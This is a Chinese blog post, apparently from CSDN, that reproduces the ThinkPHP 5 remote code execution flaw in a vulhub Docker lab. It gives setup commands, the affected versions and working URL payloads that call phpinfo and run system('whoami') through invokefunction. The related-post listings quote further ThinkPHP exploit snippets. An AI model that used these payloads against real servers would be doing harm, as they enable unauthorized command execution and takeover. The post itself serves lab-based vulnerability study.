Thinkphp 5-RCE漏洞复现

最新推荐文章于 2024-05-03 11:34:04 发布
最新推荐文章于 2024-05-03 11:34:04 发布
阅读量702 收藏 2
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59405467/article/details/132206615
版权

前言

漏洞原理

影响版本

漏洞复现

进入

 拉取环境

查看开放端口 

浏览器打开

 POC

漏洞利用

完成

前言

ThinkPHP5披露最多得漏洞就是RCE,其中的影响版本范围非常广

漏洞原理

其版本 5 中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

影响版本

5.0.0<=ThinkPHP5<=5.0.23 5.1.0<=ThinkPHP<=5.1.30
不同版本 payload 不同,且 5.13 版本后还与 debug 模式有关

漏洞复现

进入

cd vulhub-master/thinkphp/5-rce

 拉取环境

docker-compose up -d

注:拉环境之前切记要先开启docker;关闭防火墙

systemctl start docker.service
systemctl stop firewalld.service

查看开放端口 

docker ps

浏览器打开

你的ip:端口

eg:192.168.200.142:8080

 POC 

/index.phps=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

 

漏洞利用

上述 poc 只是简单的运行了 phpinfo , 我们可以修改 payload , 进而实现漏洞的利用(命令执行) 
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&va
rs[1][]=whoami

 同时也可以getshell

.........

复现结束之后要记得关闭; 
docker-compose down

完成

 

Tender…
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
ThinkPHP 多语言模块RCE漏洞复现
0xSec
12-25 3585
ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。
ThinkPHP多语言模块文件包含RCE复现详细教程
ALLEN'Blog
02-14 2113
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
vulhub thinkphp漏洞复现 | in-sqliniection、2-rce、5.0.23-rce、5-rce漏洞复现(详细图解)
鱼溯的博客
02-02 1205
vulhub thinkphp漏洞复现 | in-sqliniection、2-rce、5.0.23-rce、5-rce漏洞复现(详细图解)
ThinkPHP2--RCE漏洞复现
最新发布
m0_74402888的博客
05-03 1072
var['\1']="\2" 这里双引号引发函数执行,了解为什么${}会执行,在PHP当中,${}是可以构造一个变量的,{}写的是一般的字符,那么就会被当成变量,比如${a}等价于$a,那如果{}写的是一个已知函数名称呢?()值提取匹配的字符串,有几个括号就代表有几个匹配的字符串,看结果我们就知道,我们的目的是将键和值分别提取出来,所有有两个(),一个匹配键,一个匹配值。$a的执行语句执行了(注意如果要实现该代码需要修改php的版本为5.x的版本)s=a/a/a/${phpinfo()} 其中a随意。
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2430
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8272
ThinkPHP5系列远程代码执行漏洞复现(详细)
Think PHP 5 RCE漏洞复现及排查
dayouzi的博客
08-11 2262
ThinkPHP是一款运用极广的PHP开发框架。其漏洞点是由于ThinkPHP框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞
Thinkphp5.0.2Rce分析
lastwinn的博客
07-06 2230
记录自己的所学以及理解。
ThinkPHP5RCE漏洞复现
不想当脚本小子的脚本小子
06-10 936
又到了闲来无事的漏洞复现时间~~~ ThinkPHP RCE漏洞是由于变量覆盖而引起的,漏洞源于可以对thinkphp/library/think/Request.php文件中的method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致RCE,其攻击点较为多,有些还具有限制条件,另外该漏洞在利用上会出现一些问题。 漏洞影响范围:<= 5.0.23、<= 5.1.32。 ...
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
5. 在该漏洞中, `$dispatch` 变量将被设置为 `system`,导致 ThinkPHP 将执行系统命令 该漏洞的危害性非常高,因为它允许攻击者在服务器上执行任意代码,从而导致敏感数据泄露、服务器控制权劫持等问题。 为了...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x , 可以利用poc直接检测目标网站是否存在漏洞
thinkphp5 rce
weixin_51558394的博客
08-17 443
thinkphp5 rce
Thinkphp5 RCE漏洞
Sentiment的博客
05-21 7010
影响版本 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 不同版本payload不同,且5.13版本后还与debug模式有关 这里跟着feng师傅复现的,所以用的也是5.0.22 ThinkPHP5.0.22完整版 - ThinkPHP框架 5.0.22debug模式RCE 这波属实下饭了,开启debug模式后payload一直没打通,后来发现改成其他版本的配置文件了.........
红队攻防实战之ThinkPHP-RCE集锦
自强不息
12-09 868
你若不勇敢,谁又可以替你坚强?
buuctf [ThinkPHP]5-Rce
qq_1873822的博客
03-14 1758
大佬们都是直接rce 这里漏洞技术细节(涉及代码段、原理等)我上个链接 https://blog.csdn.net/ArrowQin/article/details/105913146 https://bbs.ichunqiu.com/thread-48687-1-1.html?tdsourcetag=s_pcqq_aiomsg 解题 版本是ThinkPHP V5.0.20 poc ?s=index/\think\app/invokefunction&function=call_user_fun.
thinkphp2-rce
07-28
ThinkPHP 2.x版本中存在远程代码执行(RCE漏洞。该漏洞可以通过构造恶意的请求来执行任意的PHP代码。具体来说,漏洞出现在ThinkPHP框架中的路由处理函数中,使用了不安全的preg_replace函数,并且使用了/e模式进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tender…

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值